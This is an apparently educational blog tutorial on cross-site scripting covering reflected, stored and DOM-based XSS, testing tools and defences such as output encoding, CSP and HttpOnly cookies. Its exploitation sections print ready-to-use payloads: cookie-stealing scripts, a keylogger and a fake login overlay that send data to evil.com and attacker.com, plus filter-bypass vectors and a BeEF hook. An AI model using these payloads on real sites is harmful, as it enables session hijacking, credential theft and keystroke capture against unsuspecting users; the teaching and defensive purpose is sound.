Cross-Site Scripting (XSS) Attack

Published: December 1, 2025 Reading Time: 16 mins
👨‍💻 Attacker <script> alert('XSS') </script> Malicious Script 🌐 Web App Vulnerable Site 👤 Victim

Cross-Site Scripting (XSS) is a client-side code injection attack where an attacker injects malicious scripts into trusted websites. XSS allows attackers to execute arbitrary JavaScript in victims' browsers, potentially stealing credentials, session tokens, or performing actions on behalf of the user.

💡

What is XSS?

XSS occurs when a web application includes untrusted data in its output without proper validation or encoding. This allows attackers to inject client-side scripts that execute in other users' browsers.

Types of XSS Attacks

1. Reflected XSS

The malicious script comes from the current HTTP request. Commonly exploited through search boxes, error messages, or URL parameters.

Reflected XSS Attack
# Vulnerable code example
<p>Search results for: <?php echo $_GET['query']; ?></p>

# Attack payload
http://victim.com/search?query=<script>alert(document.cookie)</script>

# More stealthy payload
http://victim.com/search?query=<script src="http://evil.com/steal.js"></script>

# Image-based XSS
<img src=x onerror="alert('XSS')">

# Event handler XSS
<body onload="alert('XSS')">

2. Stored XSS (Persistent XSS)

The malicious script is permanently stored on the target server (database, message forum, comment field, etc.) and served to users when they request the stored information.

# Attack scenario: Forum comment
Username: HackerUser
Comment: Great article! <script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>

# When other users view the comment, the script executes
# Stealing session cookies, tokens, or performing actions

# Profile page XSS
Bio: <img src=x onerror="this.src='http://evil.com/log?cookie='+document.cookie">

# Comment section payload
<svg onload="new Image().src='http://attacker.com/steal?c='+document.cookie">

3. DOM-Based XSS

The vulnerability exists in client-side code rather than server-side code. The attack payload is executed as a result of modifying the DOM environment.

DOM-Based XSS
# Vulnerable JavaScript code
document.getElementById('welcome').innerHTML = "Welcome " + location.hash.substring(1);

# Attack URL
http://victim.com/page.html#<script>alert(document.cookie)</script>

# Another DOM XSS example
var name = document.location.search.substring(1);
document.write("Hello " + name);

# Attack: http://victim.com/welcome?<script>alert('XSS')</script>

Advanced XSS Techniques

Bypassing XSS Filters

# Case variation
<ScRiPt>alert('XSS')</sCrIpT>

# Encoding techniques
<script>alert(String.fromCharCode(88,83,83))</script>
<img src="javascript:alert('XSS')">

# Event handlers
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
<body onpageshow=alert('XSS')>

# HTML5 vectors
<video src=x onerror=alert('XSS')>
<audio src=x onerror=alert('XSS')>

# Null byte injection
<script>alert('XSS')</script>%00</script>

# Unicode encoding
<\u0073\u0063\u0072\u0069\u0070\u0074>alert('XSS')</\u0073\u0063\u0072\u0069\u0070\u0074>

XSS Exploitation Payloads

# Cookie stealing
<script>new Image().src="http://attacker.com/steal?c="+document.cookie;</script>

# Keylogging
<script>
document.onkeypress = function(e) {
fetch('http://attacker.com/log?key='+e.key);
}
</script>

# Phishing overlay
<script>
document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Session Expired</h1><form action="http://attacker.com/phish">Username: <input name="user">Password: <input type="password" name="pass"><input type="submit"></form></div>';
</script>

# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>
XSS Exploitation Techniques

XSS Testing Tools

Manual Testing

# Basic test payloads
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
"><script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Polyglot XSS (works in multiple contexts)
javascript:/*--></title></style></textarea></script></xmp>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Automated Tools

  • XSStrike: Advanced XSS detection and exploitation suite
  • Burp Suite: Professional web vulnerability scanner
  • OWASP ZAP: Open-source web application security scanner
  • XSSer: Automated framework for detecting and exploiting XSS
  • DalFox: Fast, powerful XSS scanner and parameter analyzer

Prevention and Mitigation

Defense Strategies

Implementing multiple layers of protection is crucial for preventing XSS attacks.

1. Input Validation

  • Validate all user input against a whitelist of acceptable values
  • Reject input containing unexpected characters
  • Use strict type checking

2. Output Encoding

# HTML Entity Encoding
< becomes &lt;
> becomes &gt;
" becomes &quot;
' becomes &#x27;
/ becomes &#x2F;

# JavaScript encoding
Use proper escaping functions for different contexts

# URL encoding
Encode special characters in URLs

3. Content Security Policy (CSP)

# HTTP Header
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.com;

# Meta tag
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">

# Strict CSP
Content-Security-Policy: default-src 'none'; script-src 'nonce-random123'; style-src 'self';

4. HTTP-Only Cookies

Set cookies with HttpOnly flag to prevent JavaScript access.

Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict

5. Framework-Specific Protection

  • React: Automatic escaping in JSX (but beware of dangerouslySetInnerHTML)
  • Angular: Built-in sanitization for templates
  • Vue.js: Automatic HTML escaping in templates
  • Django: Auto-escaping in templates
⚠️

Ethical Use Only

This information is for educational purposes and authorized security testing only. Unauthorized exploitation of XSS vulnerabilities is illegal and unethical.

HackHub Professional Services

🚀

Expert XSS Testing & Remediation

The HackHub team specializes in identifying and remediating XSS vulnerabilities across web applications. With 10+ years of experience, we provide comprehensive security assessments to protect your applications from client-side attacks.

Contact [email protected] for professional web security services.

Conclusion

Cross-Site Scripting remains one of the most prevalent web application vulnerabilities. Understanding the different types of XSS, exploitation techniques, and implementing comprehensive防御 strategies is essential for securing modern web applications. Regular security testing and developer education are key to preventing XSS attacks.